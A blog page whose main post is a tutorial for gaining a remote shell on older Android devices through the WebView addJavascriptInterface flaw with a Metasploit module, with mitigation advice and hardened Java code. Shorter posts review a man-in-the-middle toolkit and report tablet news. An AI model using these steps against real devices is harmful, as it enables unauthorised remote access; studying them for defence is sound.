Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a JavaScript exploit that could give an attacker remote access to your phone after you do nothing more than surf to a malicious page or scan a malicious QR code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it triggers when untrusted JavaScript is executed by a WebView on an Android device.

And here is the kicker: about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type “use exploit/android/browser/webview_addjavascriptinterface”.

3. Then type “show options” to see what needs to be set:

[Screenshot: Use Exploit]

For the most part, you are good to go. You can turn on SSL and change the port or host address if you want. The one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter “set URIPATH Security”:

[Screenshot: Set URIPATH]

5. Finally, type “exploit”:

[Screenshot: Exploit]

A server is started on the Kali system that hosts a web page containing the exploit, and a URL including the URI path is printed.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

[Screenshot: Session created]

Now just connect to the session using “sessions -i 1”:

[Screenshot: Interacting with session]

And that is it! You are connected to the Android device.

But on one Android tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory I was in, and I could move to other directories with “cd”, but “ls” and other commands would not work:

[Screenshot: ls not found]

Whenever I ran “ls” to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo $PATH” revealed that no path was set:

[Screenshot: echo $PATH]

So I set it by typing “export PATH=/system/bin:$PATH”.

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

[Screenshot: export PATH]

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built-in Browser, and the exploit ran with no further warning or input on the Android device. To make matters worse, the URL could be printed as a QR code so that, once scanned, the device automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android older than 4.2, which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update); check with your manufacturer for instructions.

Also, never scan QR codes from unknown sources.

But I did notice that one device I tested was running 4.0, not 4.2, and it was not vulnerable. Then I remembered that the Android Browser had received an update that I downloaded before testing.

I’m not sure whether this holds for all devices; again, the best course of action is to update to the latest OS version.
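The user-side fix is to update, but there is an app-side half to this bug too. The example below is added here and is not code from the original post or from Metasploit: it shows the WebView bridge pattern the vulnerability abuses beside the hardened form that Android 4.2 (API 17) introduced. The class and method names are hypothetical; the protection only applies when the device runs 4.2 or later and the app targets API 17 or later.

```java
import android.annotation.SuppressLint;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;

// Added example (hypothetical class names): the vulnerable bridge pattern and its hardened form.
public class WebViewHardening {

    // Vulnerable pattern: on Android < 4.2, or in any app targeting API < 17, every public
    // method of the bridge object (including the inherited getClass()) is reachable from page
    // JavaScript through reflection, so any page the WebView loads can run code as the app.
    public static class LegacyBridge {
        public String deviceName() { return Build.MODEL; }
    }

    // Hardened bridge: with API 17+ enforcement, only methods carrying @JavascriptInterface
    // are visible to JavaScript, so the reflection path is closed.
    public static class SafeBridge {
        @JavascriptInterface
        public String deviceName() { return Build.MODEL; }
    }

    @SuppressLint("SetJavaScriptEnabled")
    public static void configure(WebView webView, String trustedUrl) {
        WebSettings settings = webView.getSettings();
        // JavaScript is required for the bridge; leave it disabled if the page does not need it.
        settings.setJavaScriptEnabled(true);

        // On platforms that cannot enforce the annotation, do not expose a bridge at all.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new SafeBridge(), "Device");
        }

        // Only load content you control, over HTTPS; untrusted pages should never see the bridge.
        webView.loadUrl(trustedUrl);
    }
}
```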

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux”.

Anti – Android Network Toolkit and 7″ Tablet make a $99 Pentesting Platform

Every once in a while you run into a product that just makes you sit back and say, “Wow!”

I just picked up a 7″ Polaroid tablet for $99 and was stunned at how well it works: the screen quality, how smoothly it ran and how responsive it was. In some functions it works better than my trusty iPad that cost a whole lot more.

Well, I wanted to see how well an Android tablet could work as a pentesting platform and found “Anti”, the Android Network Toolkit by zImperium. I was stunned.

I just used the “Free” version, and within seconds I was looking at a network map of all the machines on my network. Anti runs nmap scans, including an intrusive scan to detect device operating systems and vulnerabilities. Once the scan is done (it can take a while), you can click on individual systems and are presented with a tool option menu. These options include:

Attack, DoS, Cracker, Replace Image, Spy, Man in the Middle

Some of the more advanced tools require you to purchase “Anti credits” to run them. But with the free version, you can view available networks, and run scans against them.

I ran it on my wireless network and was able to view a wired system. For a short period of time, I could see a text list of the websites the computer was visiting, and even images from the visited websites. The options even included “View Passwords”, but this did not seem to be enabled in the free version. Obviously it was working in some sort of Man-in-the-Middle mode to be able to grab that information off a wired LAN system connected to a switch. Very interesting.

And this was just the free version; the paid versions reportedly include remote exploit capability.

Anti also includes a reporting feature so you can keep track of vulnerable systems found during your pentest. Using Anti on a cheap $99 Android tablet really opens up a lot of possibilities for pentesters.

India Announces $35 Android 2.2 Tablet!!!

Let the price war begin. Recently, Amazon announced the “Kindle Fire”, a Kindle reader on steroids that lets you browse the web, run apps and watch movies. Now India has announced its home-grown “Aakash Tablet”, which will initially sell to India’s college students for $35.

The Indian government is subsidizing the first 100,000 units to get the price down to $35. The actual cost is only $50, and there are plans to get the cost down to around $10.

The tablet runs Android 2.2 and sports a 7″ screen, 256 MB of RAM, 2 GB of flash memory, a 2 GB microSD card and two USB ports. It also comes with Wi-Fi support and offers 3G as an option.

Here is a video showing the tablet in use:

It looks pretty interesting, and with the low price point, a tablet price war may soon ensue. This is all good news for the end user!